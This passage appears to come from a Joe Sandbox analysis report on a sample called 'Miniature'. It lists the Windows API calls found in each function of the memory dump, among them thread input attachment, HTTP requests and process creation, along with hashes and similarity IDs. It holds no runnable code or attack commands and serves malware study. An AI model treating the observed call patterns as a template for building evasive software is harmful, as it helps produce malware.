                                                  • Associated: 0000000A.00000002.2979835735.0000000001046000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979903816.0000000001050000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979931573.0000000001059000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_f90000_Miniature.jbxd
                                                  Similarity
                                                  • API ID: MessageSend$CtrlParent$ClassName_memmove
                                                  • String ID: ComboBox$ListBox
                                                  • API String ID: 1536045017-1403004172
                                                  • Opcode ID: 294ac41ec4f703411167e92a0870de660e3d205cfff0ae4f4b738e82a21e8e9b
                                                  • Instruction ID: efa8bc7b2b7f096b576b750360dd4762f720a2dcac925b7a8315da38b2df046a
                                                  • Opcode Fuzzy Hash: 294ac41ec4f703411167e92a0870de660e3d205cfff0ae4f4b738e82a21e8e9b
                                                  • Instruction Fuzzy Hash: 3621F774D00204BBCF20AFA5CC85EFEBBB4EF99310F204115F8A197295DB794918AB20
                                                  APIs
                                                    • Part of subcall function 00FA1A36: _memmove.LIBCMT ref: 00FA1A77
                                                    • Part of subcall function 00FEB79A: GetClassNameW.USER32(?,?,000000FF), ref: 00FEB7BD
                                                  • SendMessageW.USER32(?,00000186,00000002,00000000), ref: 00FE9CB5
                                                  • GetDlgCtrlID.USER32 ref: 00FE9CC0
                                                  • GetParent.USER32 ref: 00FE9CDC
                                                  • SendMessageW.USER32(00000000,?,00000111,?), ref: 00FE9CDF
                                                  • GetDlgCtrlID.USER32(?), ref: 00FE9CE8
                                                  • GetParent.USER32(?), ref: 00FE9D04
                                                  • SendMessageW.USER32(00000000,?,?,00000111), ref: 00FE9D07
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.2979760173.0000000000F91000.00000020.00000001.01000000.00000006.sdmp, Offset: 00F90000, based on PE: true
                                                  • Associated: 0000000A.00000002.2979728446.0000000000F90000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979835735.0000000001020000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979835735.0000000001046000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979903816.0000000001050000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979931573.0000000001059000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_f90000_Miniature.jbxd
                                                  Similarity
                                                  • API ID: MessageSend$CtrlParent$ClassName_memmove
                                                  • String ID: ComboBox$ListBox
                                                  • API String ID: 1536045017-1403004172
                                                  • Opcode ID: 6eb05ad744c57c0927c6d0913c7946469d83dd81fba9c3ca7d88c3427e33cbe3
                                                  • Instruction ID: 5fe49a8cdef3f447b30c3a1df25a2961aa1db1bb33b697efaa9d7876227b9436
                                                  • Opcode Fuzzy Hash: 6eb05ad744c57c0927c6d0913c7946469d83dd81fba9c3ca7d88c3427e33cbe3
                                                  • Instruction Fuzzy Hash: AC2106B5E00205BBDF20AF61CC85EFEBBB4EF45300F204015F89197195DB794818AB20
                                                  APIs
                                                  • VariantInit.OLEAUT32(?), ref: 01008FC1
                                                  • CoInitialize.OLE32(00000000), ref: 01008FEE
                                                  • CoUninitialize.OLE32 ref: 01008FF8
                                                  • GetRunningObjectTable.OLE32(00000000,?), ref: 010090F8
                                                  • SetErrorMode.KERNEL32(00000001,00000029), ref: 01009225
                                                  • CoGetInstanceFromFile.OLE32(00000000,?,00000000,00000015,00000002,?,00000001,01023BDC), ref: 01009259
                                                  • CoGetObject.OLE32(?,00000000,01023BDC,?), ref: 0100927C
                                                  • SetErrorMode.KERNEL32(00000000), ref: 0100928F
                                                  • SetErrorMode.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 0100930F
                                                  • VariantClear.OLEAUT32(?), ref: 0100931F
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.2979760173.0000000000F91000.00000020.00000001.01000000.00000006.sdmp, Offset: 00F90000, based on PE: true
                                                  • Associated: 0000000A.00000002.2979728446.0000000000F90000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979835735.0000000001020000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979835735.0000000001046000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979903816.0000000001050000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979931573.0000000001059000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_f90000_Miniature.jbxd
                                                  Similarity
                                                  • API ID: ErrorMode$ObjectVariant$ClearFileFromInitInitializeInstanceRunningTableUninitialize
                                                  • String ID:
                                                  • API String ID: 2395222682-0
                                                  • Opcode ID: 47c6929a7b436fb113bf4e737347c60fb5dc16c61d8c85fb7af2151ca6cb7e61
                                                  • Instruction ID: 1f6e941add707d7441c50c9ab00e9ef7016903bb89fe6b2cebe3195c11c0c0a2
                                                  • Opcode Fuzzy Hash: 47c6929a7b436fb113bf4e737347c60fb5dc16c61d8c85fb7af2151ca6cb7e61
                                                  • Instruction Fuzzy Hash: 25C148712083059FE701DF68C88496BBBE9FF89748F00495DF98A9B292DB71ED05CB52
                                                  APIs
                                                  • GetCurrentThreadId.KERNEL32 ref: 00FF19EF
                                                  • GetForegroundWindow.USER32(00000000,?,?,?,?,?,00FF0A67,?,00000001), ref: 00FF1A03
                                                  • GetWindowThreadProcessId.USER32(00000000), ref: 00FF1A0A
                                                  • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,00FF0A67,?,00000001), ref: 00FF1A19
                                                  • GetWindowThreadProcessId.USER32(?,00000000), ref: 00FF1A2B
                                                  • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,00FF0A67,?,00000001), ref: 00FF1A44
                                                  • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,00FF0A67,?,00000001), ref: 00FF1A56
                                                  • AttachThreadInput.USER32(00000000,00000000,?,?,?,?,?,00FF0A67,?,00000001), ref: 00FF1A9B
                                                  • AttachThreadInput.USER32(00000000,00000000,00000000,?,?,?,?,?,00FF0A67,?,00000001), ref: 00FF1AB0
                                                  • AttachThreadInput.USER32(00000000,00000000,00000000,?,?,?,?,?,00FF0A67,?,00000001), ref: 00FF1ABB
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.2979760173.0000000000F91000.00000020.00000001.01000000.00000006.sdmp, Offset: 00F90000, based on PE: true
                                                  • Associated: 0000000A.00000002.2979728446.0000000000F90000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979835735.0000000001020000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979835735.0000000001046000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979903816.0000000001050000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979931573.0000000001059000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_f90000_Miniature.jbxd
                                                  Similarity
                                                  • API ID: Thread$AttachInput$Window$Process$CurrentForeground
                                                  • String ID:
                                                  • API String ID: 2156557900-0
                                                  • Opcode ID: d839d890d8632510ae794feda0af5dd0b61fee18c3fe166b50ff2af16c127162
                                                  • Instruction ID: 74df3a9558d808b669410dc1abe0c2681e3eb78df9da32a461d43ccd87b0a2b1
                                                  • Opcode Fuzzy Hash: d839d890d8632510ae794feda0af5dd0b61fee18c3fe166b50ff2af16c127162
                                                  • Instruction Fuzzy Hash: 2231BF71901308EFEB30DF15D848B7A77AABF58325F20811AFE41C61A9D7BE9D409B60
                                                  APIs
                                                  • GetSysColor.USER32(00000008), ref: 00F9260D
                                                  • SetTextColor.GDI32(?,000000FF), ref: 00F92617
                                                  • SetBkMode.GDI32(?,00000001), ref: 00F9262C
                                                  • GetStockObject.GDI32(00000005), ref: 00F92634
                                                  • GetClientRect.USER32(?), ref: 00FCC0FC
                                                  • SendMessageW.USER32(?,00001328,00000000,?), ref: 00FCC113
                                                  • GetWindowDC.USER32(?), ref: 00FCC11F
                                                  • GetPixel.GDI32(00000000,?,?), ref: 00FCC12E
                                                  • ReleaseDC.USER32(?,00000000), ref: 00FCC140
                                                  • GetSysColor.USER32(00000005), ref: 00FCC15E
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.2979760173.0000000000F91000.00000020.00000001.01000000.00000006.sdmp, Offset: 00F90000, based on PE: true
                                                  • Associated: 0000000A.00000002.2979728446.0000000000F90000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979835735.0000000001020000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979835735.0000000001046000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979903816.0000000001050000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979931573.0000000001059000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_f90000_Miniature.jbxd
                                                  Similarity
                                                  • API ID: Color$ClientMessageModeObjectPixelRectReleaseSendStockTextWindow
                                                  • String ID:
                                                  • API String ID: 3430376129-0
                                                  • Opcode ID: e99b40b993a48d7e4c162ac26e46f74d4542eae43800ea03e84a33a359dea203
                                                  • Instruction ID: 8c0b2214681eee18c0e0b2c4414fca666be87e01d0d741442fc13f799acc4072
                                                  • Opcode Fuzzy Hash: e99b40b993a48d7e4c162ac26e46f74d4542eae43800ea03e84a33a359dea203
                                                  • Instruction Fuzzy Hash: C6114C31900305BFEB715FA4ED09FE97BA2EB08331F244265FAA9950E9CB360951EF51
                                                  APIs
                                                  • mciSendStringW.WINMM(close all,00000000,00000000,00000000), ref: 00F9ADE1
                                                  • OleUninitialize.OLE32(?,00000000), ref: 00F9AE80
                                                  • UnregisterHotKey.USER32(?), ref: 00F9AFD7
                                                  • DestroyWindow.USER32(?), ref: 00FD2F64
                                                  • FreeLibrary.KERNEL32(?), ref: 00FD2FC9
                                                  • VirtualFree.KERNEL32(?,00000000,00008000), ref: 00FD2FF6
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.2979760173.0000000000F91000.00000020.00000001.01000000.00000006.sdmp, Offset: 00F90000, based on PE: true
                                                  • Associated: 0000000A.00000002.2979728446.0000000000F90000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979835735.0000000001020000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979835735.0000000001046000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979903816.0000000001050000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979931573.0000000001059000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_f90000_Miniature.jbxd
                                                  Similarity
                                                  • API ID: Free$DestroyLibrarySendStringUninitializeUnregisterVirtualWindow
                                                  • String ID: close all
                                                  • API String ID: 469580280-3243417748
                                                  • Opcode ID: 566e44a6d0706a856db0caf70781594c1ae807889a1f76222a4a6ab00b7ff29b
                                                  • Instruction ID: f1741da68eec38a30ce314d68c81c9c21ae816376998f6d62cc81f1788ae56cf
                                                  • Opcode Fuzzy Hash: 566e44a6d0706a856db0caf70781594c1ae807889a1f76222a4a6ab00b7ff29b
                                                  • Instruction Fuzzy Hash: F0A1CE717012228FDB29EF10C898B69F365BF04714F1442ADF90AAB351CB35AD12EF91
                                                  APIs
                                                  • EnumChildWindows.USER32(?,00FEB13A), ref: 00FEB078
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.2979760173.0000000000F91000.00000020.00000001.01000000.00000006.sdmp, Offset: 00F90000, based on PE: true
                                                  • Associated: 0000000A.00000002.2979728446.0000000000F90000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979835735.0000000001020000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979835735.0000000001046000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979903816.0000000001050000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979931573.0000000001059000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_f90000_Miniature.jbxd
                                                  Similarity
                                                  • API ID: ChildEnumWindows
                                                  • String ID: CLASS$CLASSNN$INSTANCE$NAME$REGEXPCLASS$TEXT
                                                  • API String ID: 3555792229-1603158881
                                                  • Opcode ID: bd8976e8afeb6f8b009eb7961eaa0291597251d0eac6caf38112140a8474a5cd
                                                  • Instruction ID: e7b998ea58ffd1c4157bdafcaa8b9710bff7eca5c4819adb16dd90e5c13120d7
                                                  • Opcode Fuzzy Hash: bd8976e8afeb6f8b009eb7961eaa0291597251d0eac6caf38112140a8474a5cd
                                                  • Instruction Fuzzy Hash: 4E91C7B1A00186EBCB18EF62C881BEEFB75BF44310F108119E95AA7191DF347959EB91
                                                  APIs
                                                  • SetWindowLongW.USER32(?,000000EB), ref: 00F9327E
                                                    • Part of subcall function 00F9218F: GetClientRect.USER32(?,?), ref: 00F921B8
                                                    • Part of subcall function 00F9218F: GetWindowRect.USER32(?,?), ref: 00F921F9
                                                    • Part of subcall function 00F9218F: ScreenToClient.USER32(?,?), ref: 00F92221
                                                  • GetDC.USER32 ref: 00FCD073
                                                  • SendMessageW.USER32(?,00000031,00000000,00000000), ref: 00FCD086
                                                  • SelectObject.GDI32(00000000,00000000), ref: 00FCD094
                                                  • SelectObject.GDI32(00000000,00000000), ref: 00FCD0A9
                                                  • ReleaseDC.USER32(?,00000000), ref: 00FCD0B1
                                                  • MoveWindow.USER32(?,?,?,?,?,?,?,00000031,00000000,00000000), ref: 00FCD13C
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.2979760173.0000000000F91000.00000020.00000001.01000000.00000006.sdmp, Offset: 00F90000, based on PE: true
                                                  • Associated: 0000000A.00000002.2979728446.0000000000F90000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979835735.0000000001020000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979835735.0000000001046000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979903816.0000000001050000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979931573.0000000001059000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_f90000_Miniature.jbxd
                                                  Similarity
                                                  • API ID: Window$ClientObjectRectSelect$LongMessageMoveReleaseScreenSend
                                                  • String ID: U
                                                  • API String ID: 4009187628-3372436214
                                                  • Opcode ID: 9fe3280de276955c1a1aceebc9f3913e1b771cb30591673aac1fe5cc3dd786d4
                                                  • Instruction ID: d3c19f8501cbd38a92ca51631c72cb123a531ec0cebf55bfd96ec0b93e82270b
                                                  • Opcode Fuzzy Hash: 9fe3280de276955c1a1aceebc9f3913e1b771cb30591673aac1fe5cc3dd786d4
                                                  • Instruction Fuzzy Hash: A571C03180020ADFDF218F68C985FAE7BB5FF49320F24426EED955A159C7369942EB60
                                                  APIs
                                                    • Part of subcall function 00F929E2: GetWindowLongW.USER32(?,000000EB), ref: 00F929F3
                                                    • Part of subcall function 00F92714: GetCursorPos.USER32(?), ref: 00F92727
                                                    • Part of subcall function 00F92714: ScreenToClient.USER32(010577B0,?), ref: 00F92744
                                                    • Part of subcall function 00F92714: GetAsyncKeyState.USER32(00000001), ref: 00F92769
                                                    • Part of subcall function 00F92714: GetAsyncKeyState.USER32(00000002), ref: 00F92777
                                                  • ImageList_DragLeave.COMCTL32(00000000,00000000,00000001,?,?), ref: 0101C69C
                                                  • ImageList_EndDrag.COMCTL32 ref: 0101C6A2
                                                  • ReleaseCapture.USER32 ref: 0101C6A8
                                                  • SetWindowTextW.USER32(?,00000000), ref: 0101C752
                                                  • SendMessageW.USER32(?,000000B1,00000000,000000FF), ref: 0101C765
                                                  • DefDlgProcW.USER32(?,00000202,?,?,00000000,00000001,?,?), ref: 0101C847
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.2979760173.0000000000F91000.00000020.00000001.01000000.00000006.sdmp, Offset: 00F90000, based on PE: true
                                                  • Associated: 0000000A.00000002.2979728446.0000000000F90000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979835735.0000000001020000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979835735.0000000001046000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979903816.0000000001050000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979931573.0000000001059000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_f90000_Miniature.jbxd
                                                  Similarity
                                                  • API ID: AsyncDragImageList_StateWindow$CaptureClientCursorLeaveLongMessageProcReleaseScreenSendText
                                                  • String ID: @GUI_DRAGFILE$@GUI_DROPID
                                                  • API String ID: 1924731296-2107944366
                                                  • Opcode ID: 58fb0d8a3f8fa3e6bc42e09a7edf01b605c532c765a8edcc302058bc2e5352da
                                                  • Instruction ID: 91eb6ae9cd9ada08d3c424fb15db133d5999bd700eabeef5960ece8203ade3fb
                                                  • Opcode Fuzzy Hash: 58fb0d8a3f8fa3e6bc42e09a7edf01b605c532c765a8edcc302058bc2e5352da
                                                  • Instruction Fuzzy Hash: 0151BA70244305AFEB20EF24CC95FAB7BE1FB88310F10891DF995872A5CB79A945DB52
                                                  APIs
                                                  • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 0100211C
                                                  • HttpOpenRequestW.WININET(00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 01002148
                                                  • InternetQueryOptionW.WININET(00000000,0000001F,00000000,?), ref: 0100218A
                                                  • InternetSetOptionW.WININET(00000000,0000001F,00000100,00000004), ref: 0100219F
                                                  • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 010021AC
                                                  • HttpQueryInfoW.WININET(00000000,00000005,?,?,00000000), ref: 010021DC
                                                  • InternetCloseHandle.WININET(00000000), ref: 01002223
                                                    • Part of subcall function 01002B4F: GetLastError.KERNEL32(?,?,01001EE3,00000000,00000000,00000001), ref: 01002B64
                                                    • Part of subcall function 01002B4F: SetEvent.KERNEL32(?,?,01001EE3,00000000,00000000,00000001), ref: 01002B79
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.2979760173.0000000000F91000.00000020.00000001.01000000.00000006.sdmp, Offset: 00F90000, based on PE: true
                                                  • Associated: 0000000A.00000002.2979728446.0000000000F90000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979835735.0000000001020000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979835735.0000000001046000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979903816.0000000001050000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979931573.0000000001059000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_f90000_Miniature.jbxd
                                                  Similarity
                                                  • API ID: Internet$Http$OptionQueryRequest$CloseConnectErrorEventHandleInfoLastOpenSend
                                                  • String ID:
                                                  • API String ID: 2603140658-3916222277
                                                  • Opcode ID: 4d689dcc3ff4011c39ad0d00fd8cab03f0603be15120cd2d0600a35ae5c713be
                                                  • Instruction ID: 2ad682dda029104987d03dcd6a2009098d46605eb1f20641541bda516a8810c5
                                                  • Opcode Fuzzy Hash: 4d689dcc3ff4011c39ad0d00fd8cab03f0603be15120cd2d0600a35ae5c713be
                                                  • Instruction Fuzzy Hash: 1C418CB1900208BFFB229F54CC89FFB7BACFB08354F104156FA849A185D7759A448BA0
                                                  APIs
                                                  • GetModuleFileNameW.KERNEL32(?,?,00000104,?,01020980), ref: 01009412
                                                  • FreeLibrary.KERNEL32(00000000,00000001,00000000,?,01020980), ref: 01009446
                                                  • QueryPathOfRegTypeLib.OLEAUT32(?,?,?,?,?), ref: 010095C0
                                                  • SysFreeString.OLEAUT32(?), ref: 010095EA
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.2979760173.0000000000F91000.00000020.00000001.01000000.00000006.sdmp, Offset: 00F90000, based on PE: true
                                                  • Associated: 0000000A.00000002.2979728446.0000000000F90000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979835735.0000000001020000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979835735.0000000001046000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979903816.0000000001050000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979931573.0000000001059000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_f90000_Miniature.jbxd
                                                  Similarity
                                                  • API ID: Free$FileLibraryModuleNamePathQueryStringType
                                                  • String ID:
                                                  • API String ID: 560350794-0
                                                  • Opcode ID: 19bb5ec872fdf146799217038bd11c77c480a7a3dc21d210663f8efe7d4f80ba
                                                  • Instruction ID: 04e24e070facd273182f1021b55774e041fb68bd4f904ce3265721b87c075750
                                                  • Opcode Fuzzy Hash: 19bb5ec872fdf146799217038bd11c77c480a7a3dc21d210663f8efe7d4f80ba
                                                  • Instruction Fuzzy Hash: A1F14F71A00209EFEF55DF94C884EAEB7B5FF45319F108098F559AB292CB31AE45CB50
                                                  APIs
                                                  • _memset.LIBCMT ref: 0100FD9E
                                                  • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 0100FF31
                                                  • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 0100FF55
                                                  • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 0100FF95
                                                  • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 0100FFB7
                                                  • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,?,?,00000000,?,?,?), ref: 01010133
                                                  • GetLastError.KERNEL32(00000000,00000001,00000000), ref: 01010165
                                                  • CloseHandle.KERNEL32(?), ref: 01010194
                                                  • CloseHandle.KERNEL32(?), ref: 0101020B
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.2979760173.0000000000F91000.00000020.00000001.01000000.00000006.sdmp, Offset: 00F90000, based on PE: true
                                                  • Associated: 0000000A.00000002.2979728446.0000000000F90000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979835735.0000000001020000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979835735.0000000001046000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979903816.0000000001050000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979931573.0000000001059000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_f90000_Miniature.jbxd
                                                  Similarity
                                                  • API ID: Directory$CloseCurrentHandleSystem$CreateErrorLastProcess_memset
                                                  • String ID:
                                                  • API String ID: 4090791747-0
                                                  • Opcode ID: 55c2c848f2f2e24a60a497dc1ac1abc2a0f3ce61d5695639fe2c18c93a6ae21f
                                                  • Instruction ID: 7df3ead8857a0760b2eeb79e4d2a75421849021ac233b9ec62647d575aa106da
                                                  • Opcode Fuzzy Hash: 55c2c848f2f2e24a60a497dc1ac1abc2a0f3ce61d5695639fe2c18c93a6ae21f
                                                  • Instruction Fuzzy Hash: AEE1D1312043419FEB25EF24C891A6EBBE1AF85314F14845DF9C98B2A6CB39EC41DB52
                                                  APIs
                                                    • Part of subcall function 00FF4BC3: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,00FF3B8A,?), ref: 00FF4BE0
                                                    • Part of subcall function 00FF4BC3: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,00FF3B8A,?), ref: 00FF4BF9
                                                    • Part of subcall function 00FF4FEC: GetFileAttributesW.KERNEL32(?,00FF3BFE), ref: 00FF4FED
                                                  • lstrcmpiW.KERNEL32(?,?), ref: 00FF52FB
                                                  • _wcscmp.LIBCMT ref: 00FF5315
                                                  • MoveFileW.KERNEL32(?,?), ref: 00FF5330
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.2979760173.0000000000F91000.00000020.00000001.01000000.00000006.sdmp, Offset: 00F90000, based on PE: true
                                                  • Associated: 0000000A.00000002.2979728446.0000000000F90000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979835735.0000000001020000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979835735.0000000001046000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979903816.0000000001050000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979931573.0000000001059000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_f90000_Miniature.jbxd
                                                  Similarity
                                                  • API ID: FileFullNamePath$AttributesMove_wcscmplstrcmpi
                                                  • String ID:
                                                  • API String ID: 793581249-0
                                                  • Opcode ID: 0a450a90ee062b7e8b81f326f0dd2b9f02617faedb882e97318efe423d3b5a6e
                                                  • Instruction ID: 369932c0ca43bf47e7059856791051f5456fddb536be7bc78d0d84afd5ddc04b
                                                  • Opcode Fuzzy Hash: 0a450a90ee062b7e8b81f326f0dd2b9f02617faedb882e97318efe423d3b5a6e
                                                  • Instruction Fuzzy Hash: 745187B24083499BC764EB94DC819EFB3DCAF85710F50491EF789C3152EF38A6889756
                                                  APIs
                                                  • InvalidateRect.USER32(?,00000000,00000001,?,00000001), ref: 01018D24
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.2979760173.0000000000F91000.00000020.00000001.01000000.00000006.sdmp, Offset: 00F90000, based on PE: true
                                                  • Associated: 0000000A.00000002.2979728446.0000000000F90000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979835735.0000000001020000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979835735.0000000001046000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979903816.0000000001050000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979931573.0000000001059000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_f90000_Miniature.jbxd
                                                  Similarity
                                                  • API ID: InvalidateRect
                                                  • String ID:
                                                  • API String ID: 634782764-0
                                                  • Opcode ID: 528bdb00f2c5c6b40965c95f09d39ff16d69c116eb9688effd4ee2f6f8080f2b
                                                  • Instruction ID: 1d04b0d1a8cf82856f7b9bcf556e50912a08126b32b99c39ac6e30bf161d72e7
                                                  • Opcode Fuzzy Hash: 528bdb00f2c5c6b40965c95f09d39ff16d69c116eb9688effd4ee2f6f8080f2b
                                                  • Instruction Fuzzy Hash: DF51B430641308BFEFB0AE28CC89B9D7FA5BB05310F648553F695E7199C77AAA40CB50
                                                  APIs
                                                  • LoadImageW.USER32(00000000,?,00000001,00000010,00000010,00000010), ref: 00FCC638
                                                  • ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 00FCC65A
                                                  • LoadImageW.USER32(00000000,?,00000001,00000000,00000000,00000050), ref: 00FCC672
                                                  • ExtractIconExW.SHELL32(?,00000000,?,00000000,00000001), ref: 00FCC690
                                                  • SendMessageW.USER32(00000000,00000080,00000000,00000000), ref: 00FCC6B1
                                                  • DestroyIcon.USER32(00000000), ref: 00FCC6C0
                                                  • SendMessageW.USER32(00000000,00000080,00000001,00000000), ref: 00FCC6DD
                                                  • DestroyIcon.USER32(?), ref: 00FCC6EC
                                                    • Part of subcall function 0101AAD4: DeleteObject.GDI32(00000000), ref: 0101AB0D
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.2979760173.0000000000F91000.00000020.00000001.01000000.00000006.sdmp, Offset: 00F90000, based on PE: true
                                                  • Associated: 0000000A.00000002.2979728446.0000000000F90000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979835735.0000000001020000.00000002.00000001.01000000.00000006.sdmpDownload File
